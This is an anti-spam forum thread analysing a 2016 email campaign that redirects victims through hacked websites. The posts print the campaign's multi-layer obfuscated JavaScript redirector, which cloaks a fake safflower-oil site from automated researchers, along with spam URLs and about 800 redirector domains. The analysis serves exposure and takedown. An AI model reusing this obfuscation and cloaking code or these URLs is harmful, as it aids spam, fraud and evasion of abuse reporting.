Save The Children = Safflower Oil Spammers in stealth mode

This is transferred to the new board at http://fraudreports.prophpbb.com
Spammers should not profit, so post information here that hits their pockets.

Save The Children = Safflower Oil Spammers in stealth mode

Postby spamislame » Thu Feb 04, 2016 4:40 pm

So I have an update on this whole "Save the Children" spam campaign we've been seeing lately.

It took a while and a bit of extra digging just due to how deeply this group obfuscates their code.

Of course there is NOTHING altruistic about this spam campaign.

So here we go...

Spam arrives, in the case of the test group I'm being provided messages from they always have these characteristics:

  • They are "from" a friend of yours, and sent to you and other friends you probably both know.
  • Usually "from" a Yahoo Mail account that was compromised at least 6 - 12 months ago.
  • Usually sent to that person's address book at the time that account was compromised.
  • Lately they don't care whether they quote the original Yahoo Mail account or not in the "from". They'll just make up a fake domain.
  • Subject line is either "Hey" or "Re:"
  • Contents are only the spammed url.
  • Spam (usually) sent to 7 recipients at a time, usually several times a day.
  • Always claims to be "Sent from Yahoo Mail for iPhone"

So in today's example if the friend's name was registered as "Fred Flintstone" and the Yahoo Mail account was originally "fredflintstone@yahoo.com", and the spam was sent to his friends which were swiped from his Yahoo account we get something like this as the spam message (genuine header minus the obvious replacements):

Code: Select all
Delivered-To: bettyrubble@yahooothermail.com
Received: by 10.107.41.210 with SMTP id p201csp1448301iop;
        Wed, 3 Feb 2016 04:17:36 -0800 (PST)
X-Received: by 10.28.63.200 with SMTP id m191mr3410925wma.21.1454501856316;
        Wed, 03 Feb 2016 04:17:36 -0800 (PST)
Return-Path: <FredFlintstone@teleperf.com>
Received: from smtp-out02.msg.oleane.net (smtp-out02.msg.oleane.net. [62.161.3.11])
        by mx.google.com with ESMTP id n11si12270029wmd.46.2016.02.03.04.17.35;
        Wed, 03 Feb 2016 04:17:36 -0800 (PST)
Received-SPF: neutral (google.com: 62.161.3.11 is neither permitted nor denied by best guess record for domain of FredFlintstone@teleperf.com) client-ip=62.161.3.11;
Authentication-Results: mx.google.com;
       spf=neutral (google.com: 62.161.3.11 is neither permitted nor denied by best guess record for domain of FredFlintstone@teleperf.com) smtp.mailfrom=FredFlintstone@teleperf.com
Received: from smtp08.msg.oleane.net (smtp08.mail.priv [172.17.20.117])
   by smtp-out02.msg.oleane.net with ESMTP id u13CHXEf015800;
   Wed, 3 Feb 2016 13:17:33 +0100
Received: from smtp.teleperf.com (bba402277.alshamil.net.ae [83.110.143.195]) (authenticated)
   by smtp08.msg.oleane.net (MTA) with ESMTP id u13CHSSP010320;
   Wed, 3 Feb 2016 13:17:29 +0100
X-Oleane-Rep: REPA
Date: Tue, 3 Feb 2016 01:17:29 +0000
From: Fred Flintstone <FredFlintstone@teleperf.com>
To: "Wilma" <wilmaflintstone@somedomain.com>, "Rubble" <bettyrubble@yahooothermail.com>,
     "Dino" <dino@mydomain.com> [...]
Message-ID: <fdab7e41338d$cc9c673e$20a6e5fa$@teleperf.com>
Subject: Re:
MIME-Version: 1.0
Content-Type: multipart/alternative;
   boundary="----=_NextPart_000_2E19_4210C38B.3168B45F"
   
X-Backend: vm-smtp-sophos17v3
X-Spam-Flag: YES
X-PMX-Spam: Probability=84%
X-Spam-Level: XXXXXXXX
X-PFSI-Info: PMX 6.0.0.2142326, Antispam-Engine: 2.7.2.2107409, Antispam-Data: 2016.2.3.120616 (no antivirus check)
X-Orange-Auth: YS5sZXRyZW5AdGVsZXBlcmYuY29t

------=_NextPart_000_2E19_4210C38B.3168B45F
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable


  blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px=
 #715FFA solid !important;  padding-left:1ex !important; background-color:w=
hite !important; }  http://bnoshop.com/might.php=C2=A0 =C2=A0


Fred Flintstone
Sent from Yahoo Mail for iPhone
 =C2=A0 =C2=A0
------=_NextPart_000_2E19_4210C38B.3168B45F
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit

<div><br></div>
                <style type="text/css" scoped="">
                    blockquote, div.yahoo_quoted {
                        margin-left: 0 !important;
                        border-left:1px #715FFA solid !important;
                        padding-left:1ex !important;
                        background-color:white !important;
                    }
                </style>
                <a href="http://bnoshop.com/might.php"><a href="http://bnoshop.com/might.php" target="_blank">http://bnoshop.com/might.php</a></a>&nbsp; &nbsp;<br><br><br>Fred Flintstone<br><a href="https://yho.com/footer0">Sent from Yahoo Mail for iPhone</a><br>
            <div>&nbsp; &nbsp;</div>
------=_NextPart_000_2E19_4210C38B.3168B45F--


Nothing really new there other than the fact that the sending mail server is usually located somewhere in the Middle East, typically Iran, Saudi Arabia, or as in this case the United Arab Emirates.

But here is why we have recently seen these "save the children" responses: They sense whether you are researching the URL or not.

If you use a tool like wget or curl or wheregoes or anything else, a cookie they are expecting to see will not be written, and the result will be that you're redirected to one or another charity site. Previously it was save the children but today I notice it switched to "help-save-wildlife.net".

Here is the breakdown of the spammed url.

Original spammed url:

http://bnoshop.com/might.php

bnoshop.com is of course a hacked web server. In this case it's an e-commerce site selling toiletries and snacks. (Tim Tams! ;) )

In many cases the main website either doesn't exist or has been badly broken through some kind of misconfiguration. Hackers placed this php script on this server. There are usually dozens of these throughout the entire site directory structure.

That php script chooses from one of (usually) three redirection targets and send you there via JavaScript redirect.

Yesterday the above spam message had three redirects:

Code: Select all
Spammed url:
http://bnoshop.com/might.php

Redirect:
http://zhevnp.com/?a=370951&c=uwl&s=03BAM
http://axonk.com/?a=370951&c=uwl&s=03BAM
http://lapagn.com/?a=370951&c=uwl&s=03BAM


Today it was only one:

Code: Select all
Spammed url:

Redirect:
http://elyzj.com/?a=370951&c=uwl&s=03BAM


But here's a collection of several from previous days:

Code: Select all
Spammed url:
http://www.cytnet.com.ar/yet.php

Redirects:
http://jifgjt.com/?a=370951&c=uwl&s=05MIX
http://hzvziy.com/?a=370951&c=uwl&s=05MIX
http://trtvb.com/?a=370951&c=uwl&s=05MIX

Spammed url:
http://cobaltvc.com/open.php

Redirects:
http://okxunk.net/?a=370951&c=uwl&s=29MIX
http://bfgfz.net/?a=370951&c=uwl&s=29MIX

Spammed url:
http://www.cytnet.com.ar/yet.php

Redirects:
http://pactz.net/?a=370951&c=wl_con&s=05MIX
http://dshbn.net/?a=370951&c=wl_con&s=05MIX
http://zxgaie.net/?a=370951&c=wl_con&s=05MIX


Etc.

Anyway let's continue down that path.

Using sneakier means, I trace the output of that redirect:

http://elyzj.com/?a=370951&c=uwl&s=03BAM

(Cleaned up for forum readability)

Code: Select all
<!DOCTYPE html>
<html>
    <head>
        <script language="javascript" type="text/javascript">
            var O1O='=oQKpkyJ8dCK0lGbwNnLnIXY2xXZ0lmc3xXMzADM1xHMzADM1xHduVWb1N2bkx
                  XY3ADM1xnZzADM1xnZ0ADM1xXZwF2YzVmb1xnMyADM1xXY2ADM1xHf8hzNwATd8RzMwATd8
                  ZjMwATd8V2MwATd8J2NwATd8RmNwATd8R2NwATd8ZWNwATd8djMwATd8F2MwATd8J2MwATd
                  8N2MwATd8lzNwATd8VDNwATd8hjNwATd8ZzNwATd8RmMwATd8VzNwATd8FjMwATd8dzNwAT
                  d8BzNwATd8ljMwATd8djNwATd8JjNwATd8NjNwATd8ZjNwATd8ZmMwATd8FGMwATd8lDMwA
                  Td8R2MwATd8NzNwATd8VGchN2cl9FfycDMwUHf0cDMwUHf5ITM8JjN8ZTN8VmNwATd8ljNw
                  ATd8FjNwATd8NmNwATd8VmMwATd8RjNwATd8hjMwATd8JmNwATd8BjMwATd8ZmNwATd8VjN
                  wATd8xWY2VGf0lGbwNHf05WSlNnchBHfwhXRnVmU8VGZvNkchh2Qt9mcmx3Zulmc0N1b0x3
                  dl5GfmlGfn5WayR3U8xXZslGa3xXZjFGbwVmc852bpR3YuVnZ85mc1RXZyxHf8xHf8xHf8x
                  Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8
                  xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf
                  8xHf8xHf8xHf8xHf8dCL0AjMsIjNscSKp03esADLpcCX8dCXogmMucCXTJDfSJDfVJDfWJD
                  fZJDfwMDfYJDfXJDfRJDfQJDfKJDfJJDfIJDfLJDfMJDfPJDfOJDfNJDfaJDf5MDfoNDflN
                  DfjNDfmNDfnNDfkNDfhNDfzMDfyMDfxMDfiNDf0MDf3MDf4MDfUJDf6JDfvJDfsJDf1MDfhJ
                  DfnJDfpJDfmJDfuJDflJDfoJDf3IDfjJDfiJDf4IDf5IDfkJDf2MDfqJDfrJDftJDfGJDfBJ
                  DfwJDfCJDfDJDfFJDfEJDf5JDf4JDfzJDfyJDfHJDfxJDf0JDf1IDf1JDf2IDf8xHf8xHf8x
                  Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCXscnMsY
                  nMscCXpkSKnwFXcx3JcxFXowWMucCXcxFSxw3RxwnRxwXSxwnSxwHTxw3SxwXRxwHRxwnTxw
                  3dxwndxwXexwnexw3QxwnQxwXQxwXTxwHVxwnWxwXMywXWxwHWxwHMywHNyw3MywnMywnVxw
                  XUxwHUxw3Vxw3TxwnUxw3UxwXVxwHexwnbxw3NxwnNxwXNxwHOxwXOxwnYxwXYxwHNxwXdxw
                  3MxwXW8pFfYxHMxwnMxwXMxw3YxwHdxwHZxcCXcxFLWxiVscCXcx1OpkSSo8EKT5iU7cCXcx
                  FXcxFXFVCNl4WJzUSOlcTJlVyZloUJiVydlIWJ0VCelcWJ0UCMlYTJmVCMlMWJzUCOlEWJ4U
                  yMlIXJxVCMlMXJ1USZlEXJuVCOlATJwVyZlcWJ6ViblQTJ0UCclgXJxUSalETJjVCMlkTJwV
                  iZlYTJyUyMlQTJ1UyNlITJ4UiZlIXJyUSYlYTJzUiclETJxUSMlETJiVSQlETJwUSZlgTJwU
                  SMlcXJiVCdlgXJnVCOlMTJyUSclkTJwUiclITJ4UyYlMWJ1USZlEXJ1UCOlcTJxVSOlcWJ2V
                  SNlEWJ2VSOlATJzVCMlcWJ3UiQlITJkViNlATJnVyQlITJ3UiZlgUJRVidlgTJwUiZlAXJ0U
                  COlUTJwUCclEXJMVCUlwUJnVyZloXJuVCNlQTJwVCelETJpVSMlMWJwUSOlAXJmViNlITJzU
                  CNlUTJ3UiMlgTJmViclITJhViNlMTJyVSMlETJxUSMlIWJBVSMlwWJsVialEWJwUCOl0WJ1U
                  iNlATJ5VSZlATJzUCZlITJyUyNlkXJwUSOlUTJqVSMlMWJzUiYlcXJiVCdlwWJhVCMlgTJtV
                  SNlYTJ1VCMlMTJkViMlITJ3UialETJ2USOl8WJ0UCMlkTJoViYlcXJoViYlQXJwUSZlgTJ1U
                  yYlETJ6VSMlATJvVSOlQTJxUCRlETJsVCVlEXJxUSalsUJxUCblsWJwUyMlQWJyUiMlcTJ0U
                  SZlATJ0UyaloWJjVSTlcUJwUSYlYTJzUiZlATJzUCZlITJyUyNlYWJ0UiNlATJDVyblcTJyU
                  SYloWJxUSalETJhVCMlgTJtVSNlYTJ1VCMlMTJkViMlITJ3UCalgWJiVCdlsWJwUyMlQWJyU
                  iMlcTJ0USZlATJ0UyalkWJwUyMlQWJyUiMlcTJmVCNlYTJwUyQl8WJ3UiMlEWJoVCalIWJxU
                  SQlgWJiVCblEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJLVSMlYUJGVSMlsWJhVCMlYTJzU
                  yYlATJhViNl8WJrVSMlkWJpVSMlEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJmVSOlITJ0U
                  SNlIUJzUyclUTJ2USMlMWJyUCMl4WJ2VCNloWJxUyYlMTJoViYlIWJ0VCMlUWJ4USNlMWJxU
                  ielETJwUyblkTJ0USMlQUJxUCblEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJmVSOlITJ0U
                  SNlIUJzUyclUTJ2UialETJpVSMlEWJwUCOl0WJ1UiNlUXJwUyMlQWJyUiMlcTJxUSOlUTJzV
                  CalIWJBViYlwWJqVSYlATJ4USblUTJ2UCMlkXJlVCMlMTJkViMlITJ3USelATJ5USNlETJ2U
                  iMlMTJ0UyNlYTJvVyYlIWJFVyalQTJuVyMlkTJ3USZlUTJzVSNlgUJnVCNlcUJwUCNlsWJpV
                  CMl4WJ2VCNlETJ0UiblMTJ5UyNlUWJKVyJcxFXcxFXc1TSg40JcxFXo0HcgcVf9lSXjt1ask
                  yJcxFXndCXcxFLnwFXcJGXcxFXcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchybxA
                  iaxgyax4Cc9A3ep01YbtGKpFzep0SLjhCaxsTfpkSZxgiZx4yY6kyZxsyYo0WMuIXM/MXM+k
                  SYlMWPjhCKrkSKpE2LjhScxgSZ6cCXcx1JcxFX/EGPjhyV7lyYoUVPltXKkxSZssGLjxSYsA
                  HKVhCcxcCXo0HcgUjM91XKdN2WrxSKnw1ZnwFLnwlYcxFXcdCXrkyYoU2KnwlYcxFXcdCXoY
                  mMgMmMocjMuAXPwtXKdN2WrhiYysXKt0yYogjM70XM9M2O9dCXrcHXcxFXnwVNysXKoYjM9U
                  2Od1XXltFZgUjM7lSZoYjMb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0yYogjM7lSKhJDLv4
                  1LocjMucCXnwVIoImM70XKpYzMoQmMuMmOpkjMrMGKlJjLhJzP1MjPpEWJj1zYogyKpkSKh9
                  yYocmMoUmOnw1Jc9TY8MGK1IzepMGK2ITPltXKkxSZssGLjxSYsAHK2IDKpJzJo0Hcg4mc1R
                  XZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlNWYsBXZy5Cc9A
                  3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9
                  mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZyt
                  XKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ';
            function l1l(data){
               var O0IlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
               var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
               do{
                  h1=O0IlOI.indexOf(data.charAt(i++));h2=O0IlOI.indexOf(data.charAt(i++));h3=O0IlOI.indexOf(data.charAt(i++));
                  h4=O0IlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;
                  if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}
               }while(i<data.length);
               return enc
            }
            function O0I(string){ var ret = '', i = 0;   for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
            eval(l1l(O0I(O1O)));
      </script>
    </head>
    <body>
    </body>
</html>


Pretty clever right? Obfuscate everything, making it harder to report. Challenge accepted.

Using sneakier means again, I figure out what that is outputting:

(Again: cleaned up for output here)

Code: Select all
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)
))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){i
f(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return
p}('2i(26(p,a,c,k,e,d){e=26(c){25(c<a?\'\':e(2g(c/a)))+((c=c%a)>35?2a.
2e(c+29):c.2d(36))};2b(!\'\'.27(/^/,2a)){28(c--){d[e(c)]=k[c]||e(c)}k=
[26(e){25 d[e]}];e=26(){25\'\\\\w+\'};c=1};28(c--){2b(k[c]){p=p.27(2c
2f(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}25
p}(\'1p(U(p,a,c,k,e,d){e=U(c){W(c<a?\\\'\\\':e(1q(c/a)))+((c=c%a)>1s?1
r.1m(c+1g):c.1f(1e))};1h(c--){1i(k[c]){p=p.1k(1j
1o(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}W
p}(\\\'N
I=\\\\\\\'%J%e%7%9%3%n%4%1%4%v%n%0%i%k%4%0%G%4%g%H%5%s%5%e%7%9%3%n%4%k
%E%b%c%o%6%7%4%3%2%6%1%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%b%A%b
%h%s%5%9%1%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%1%j%6%5%s%3%B%5%4%2%9%f%7%2%2
%d%3%0%u%6%5%m%8%0%a%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%b%h%3%c%1%j%4
%v%n%0%2%c%1%6%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%i%1%k%o
%6%a%0%c%3%6%0%a%k%1%F%F%1%K%7%2%2%d%3%0%u%6%5%m%8%0%a%l%b%h%A%1%b%h%h
%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%i%k%4%0%e%4%7%2%2%d%3%0%k%t%b%h%h%7%2%2
%d%3%0%u%6%5%m%8%0%a%1%i%1%j%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%f%3%6%a%0%G
%M%c%j%k%4%0%e%4%7%2%2%d%3%0%k%l%1%K%i%1%q%T%l%1%D%1%4%9%o%0%1%z%1%c%5
%8%e%0%t%b%h%w%b%h%9%0%4%o%9%6%1%j%7%2%2%d%3%0%u%6%5%m%8%0%a%l%t%b%w%b
%3%c%1%j%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%l%1%A%b%1%1%1%1%r%3
%6%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%L%P%L%q%p%0
%5%8%4%p%f%0%8%v%Q%H%f%7%2%C%g%0%6%d%2%B%7%g%0%s%0%9%v%a%5%v%g%9%q%7%8
%5%q%e%5%c%c%8%2%r%0%9%q%2%3%8%g%x%t%b%w%1%0%8%e%0%1%A%b%1%1%1%1%r%3%6
%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%p%0%8%n%q%e%5
%s%0%q%r%3%8%a%8%3%c%0%f%6%0%4%g%x%t%b%w%b%J%g%e%7%9%3%n%4%E\\\\\\\';R
.S(O(I));\\\',V,V,\\\'1d|1t|1c|11|12|10|X|Z|Y|13|1u|14|1a|1b|19|18|15|
16|17|1n|1x|1U|1S|1R|1O|1W|1P|1Q|1V|22|23|24|20|1X|1Y|21|1Z|1T|1M|1A|1
B|1C|1z|1y|1v|1w|1N|1D|1E|1K|1L|1J|1I|1F|1G|1H\\\'.1l(\\\'|\\\')))\',2
v,2w,\'||||||||||||||||||||||||||||||||||||||||||||||||||||||||26|2u|2
5|2t|2q|2G|2r|2s|2x|2y|2D|2E|2C|2B|2p|2A|2F|2m|2k|2j|36|2d|29|28|2b|2c
|27|2h|2e|2n|2f|2i|2g|2a|35|2l|2o|2z|2T|38|37|34|3b|31|32|33|3a|3d|3g|
3f|3c|3e|3h|39|2Z|2M|2N|2O|2L|2K|2H|2I|2J|2P|2Q|2W|2X|30|2Y|2V|2U|2R|2
S\'.2h(\'|\'),0,{}))',62,204,'||||||||||||||||||||||||||||||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|||||||||||||||||||return|function|replace|while||String|if|new|toStri
ng|fromCharCode|RegExp|parseInt|split|eval|u0065|u006f|u0020|u006b|u00
28|u0064|u002e|u006c|u0061|u0069|u006e|56|62|129|u0074|u0072|_escape|u
0073|u003d|u0009|u000a|u002f|u0066|u0063|u0062|u0067|u0029|u0070|u0077
|u0021|u0075|u002d|u0076|u0068|u0045|u0079|u003c|u003b|u003a|u0027|u00
5f|u007d|u006d|u007b|u003e|u0026|u0034|u0078|||u006a|u0022|unescape|u0
04f|u003f|u007a|document|u0030|u0031|write|var'.split('|')))


But we're not done:

Code: Select all
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[
c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('N
I=\'%J%e%7%9%3%n%4%1%4%v%n%0%i%k%4%0%G%4%g%H%5%s%5%e%7%9%3%n%4%k%E%b%c%o
%6%7%4%3%2%6%1%5%9%0%y%7%2%2%d%3%0%e%y%0%6%5%m%8%0%a%j%l%b%A%b%h%s%5%9%1
%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%1%j%6%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5
%m%8%0%a%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%b%h%3%c%1%j%4%v%n%0%2%c%1%6
%5%s%3%B%5%4%2%9%f%7%2%2%d%3%0%u%6%5%m%8%0%a%1%i%i%1%k%o%6%a%0%c%3%6%0%a
%k%1%F%F%1%K%7%2%2%d%3%0%u%6%5%m%8%0%a%l%b%h%A%1%b%h%h%a%2%7%o%C%0%6%4%f
%7%2%2%d%3%0%i%k%4%0%e%4%7%2%2%d%3%0%k%t%b%h%h%7%2%2%d%3%0%u%6%5%m%8%0%a
%1%i%1%j%a%2%7%o%C%0%6%4%f%7%2%2%d%3%0%f%3%6%a%0%G%M%c%j%k%4%0%e%4%7%2%2
%d%3%0%k%l%1%K%i%1%q%T%l%1%D%1%4%9%o%0%1%z%1%c%5%8%e%0%t%b%h%w%b%h%9%0%4
%o%9%6%1%j%7%2%2%d%3%0%u%6%5%m%8%0%a%l%t%b%w%b%3%c%1%j%5%9%0%y%7%2%2%d%3
%0%e%y%0%6%5%m%8%0%a%j%l%l%1%A%b%1%1%1%1%r%3%6%a%2%r%f%8%2%7%5%4%3%2%6%f
%p%9%0%c%1%i%1%x%p%4%4%n%z%g%g%L%P%L%q%p%0%5%8%4%p%f%0%8%v%Q%H%f%7%2%C%g
%0%6%d%2%B%7%g%0%s%0%9%v%a%5%v%g%9%q%7%8%5%q%e%5%c%c%8%2%r%0%9%q%2%3%8%g
%x%t%b%w%1%0%8%e%0%1%A%b%1%1%1%1%r%3%6%a%2%r%f%8%2%7%5%4%3%2%6%f%p%9%0%c
%1%i%1%x%p%4%4%n%z%g%g%p%0%8%n%q%e%5%s%0%q%r%3%8%a%8%3%c%0%f%6%0%4%g%x%t
%b%w%b%J%g%e%7%9%3%n%4%E\';R.S(O(I));',56,56,'u0065|u0020|u006f|u0069|u0
074|u0061|u006e|u0063|u006c|u0072|u0064|u000a|u0066|u006b|u0073|u002e|u0
02f|u0009|u003d|u0028|u0022|u0029|u0062|u0070|u0075|u0068|u002d|u0077|u0
076|u003b|u0045|u0079|u007d|u0027|u005f|u003a|u007b|u0067|u006d|u003f|u0
03e|u0026|u0078|u006a|_escape|u003c|u0021|u0034|u004f|var|unescape|u0030
|u007a|document|write|u0031'.split('|')))


One more:

Code: Select all
var
_escape='%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0
070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0
061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u003e%u000a%u0066%u0075%u0
06e%u0063%u0074%u0069%u006f%u006e%u0020%u0061%u0072%u0065%u005f%u0063%u0
06f%u006f%u006b%u0069%u0065%u0073%u005f%u0065%u006e%u0061%u0062%u006c%u0
065%u0064%u0028%u0029%u000a%u007b%u000a%u0009%u0076%u0061%u0072%u0020%u0
063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0
064%u0020%u003d%u0020%u0028%u006e%u0061%u0076%u0069%u0067%u0061%u0074%u0
06f%u0072%u002e%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0
062%u006c%u0065%u0064%u0029%u0020%u003f%u0020%u0074%u0072%u0075%u0065%u0
020%u003a%u0020%u0066%u0061%u006c%u0073%u0065%u003b%u000a%u000a%u0009%u0
069%u0066%u0020%u0028%u0074%u0079%u0070%u0065%u006f%u0066%u0020%u006e%u0
061%u0076%u0069%u0067%u0061%u0074%u006f%u0072%u002e%u0063%u006f%u006f%u0
06b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0064%u...74%u0069%u
006f%u006e%u002e%u0068%u0072%u0065%u0066%u0020%u003d%u0020%u0027%u0068%u
0074%u0074%u0070%u003a%u002f%u002f%u0034%u0030%u0034%u002d%u0068%u0065%u
0061%u006c%u0074%u0068%u002e%u0065%u006c%u0079%u007a%u006a%u002e%u0063%u
006f%u006d%u002f%u0065%u006e%u006b%u006f%u0067%u0063%u002f%u0065%u0076%u
0065%u0072%u0079%u0064%u0061%u0079%u002f%u0072%u002d%u0063%u006c%u0061%u
002d%u0073%u0061%u0066%u0066%u006c%u006f%u0077%u0065%u0072%u002d%u006f%u
0069%u006c%u002f%u0027%u003b%u000a%u007d%u0020%u0065%u006c%u0073%u0065%u
0020%u007b%u000a%u0020%u0020%u0020%u0020%u0077%u0069%u006e%u0064%u006f%u
0077%u002e%u006c%u006f%u0063%u0061%u0074%u0069%u006f%u006e%u002e%u0068%u
0072%u0065%u0066%u0020%u003d%u0020%u0027%u0068%u0074%u0074%u0070%u003a%u
002f%u002f%u0068%u0065%u006c%u0070%u002d%u0073%u0061%u0076%u0065%u002d%u
0077%u0069%u006c%u0064%u006c%u0069%u0066%u0065%u002e%u006e%u0065%u0074%u
002f%u0027%u003b%u000a%u007d%u000a%u003c%u002f%u0073%u0063%u0072%u0069%u
0070%u0074%u003e';document.write(unescape(_escape));


And finally:

Code: Select all
<script type="text/javascript">
function are_cookies_enabled()
{
   var cookieEnabled = (navigator.cookieEnabled) ? true : false;

   if (typeof navigator.cookieEnabled%u...74ion.href = 'http://404-health.elyzj.com/enkogc/everyday/r-cla-safflower-oil/';
} else {
    window.location.href = 'http://help-save-wildlife.net/';
}
</script>


That doesn't look quite right to me, but that's what I get out of it, and it's what I see when I inspect elements on the resulting page before it redirects.

All that! Just to output 10 lines of basic JavaScript!

We can see that they're doing some basic check for cookie functionality. If it doesn't pass: you get the charity site. If it does: you get the stupid fake safflower oil site.

In other words: genuine browser = you're a typical human, otherwise you are probably investigating where this is hosted via automated means.

I've also noticed that in many, many cases they are doing some specific blocking of IP addresses, notably those of the abuse departments of hosting companies affected by these hacks which have placed these php files on the server in the first place. The response is a straight 404 error for a preset audience, making it that much more difficult to report these sites. I've had to argue with several abuse teams to convince them that the malicious file actually is there. It took ages.

If this isn't a sign that reporting these hacks is impacting their business, I don't know what is. Look at the ridiculous lengths this group has gone to to throw someone off their path.

Anyway: that is what's really going on here.

SiL / IKS / concerned citizen
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 05, 2016 4:16 pm

That is an absolutely brilliant analysis of something has has been puzzling me for a long time.
I was barking up the wrong tree thinking that somehow they were usurping donations to the Save the Children fund!

I would like to add some additional information. I have detected 800 domain names used as the redirector sites. They follow a simple naming pattern. They are spread over registrars as shown in this table

REGISTRARS
Code: Select all
241 HICHINA ZHICHENG TECHNOLOGY LTD.
102 NAUNET-RU
 79 ERANET INTERNATIONAL LIMITED
 54 BR DOMAIN INC. DBA NAMEGEAR.CO
 49 TURNCOMMERCE, INC. DBA NAMEBRIGHT.COM
 36 35 TECHNOLOGY CO., LTD
 33 ALPNAMES LIMITED
 31 CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
 24 INTERNET DOMAIN SERVICE BS CORP
 24 BIGROCK SOLUTIONS LIMITED
 19 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 19 JIANGSU BANGNING SCIENCE & TECHNOLOGY CO. LTD
 18 BIZCN.COM, INC.
...


TLDs
The TLD breakdown is
Code: Select all
.com  380
.net 303
.ru 115


HOSTING
Most domains reside on multiple host IP addresses (3 to 6)
Code: Select all
kloidsecse.ru has address 85.143.218.145

jbapbp.net has address 5.196.157.62
jbapbp.net has address 5.39.34.138
jbapbp.net has address 185.31.208.226

jhjrdp.com has address 188.127.231.48
jhjrdp.com has address 188.127.249.180
jhjrdp.com has address 188.225.37.17
jhjrdp.com has address 188.225.37.18

josdt.com has address 51.254.244.155
josdt.com has address 51.254.244.157
josdt.com has address 5.196.32.118
josdt.com has address 5.196.157.61
josdt.com has address 5.39.34.135
josdt.com has address 176.31.28.81


I feel it is likely from the quantity and look of the domain names that these sites are registered and installed specifically for the purpose of obfuscated redirection.

SUSPENSIONS
620 redirector sites have been suspended
180 redirector sites are still live
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Save The Children = Safflower Oil Spammers in stealth mo

Postby Red Dwarf » Fri Feb 05, 2016 4:59 pm

> Previously it was save the children but today I notice it switched to "help-save-wildlife.net".

Hmm, can you recheck that?

Domain Name: HELP-SAVE-WILDLIFE.NET
Registrar: GODADDY.COM, LLC
Sponsoring Registrar IANA ID: 146
Whois Server: whois.godaddy.com
Referral URL: http://www.godaddy.com
Name Server: NS7.ROOKDNS.COM
Name Server: NS8.ROOKDNS.COM
Status: clientDeleteProhibited https://www.icann.org/epp#clientDeleteProhibited
Status: clientRenewProhibited https://www.icann.org/epp#clientRenewProhibited
Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
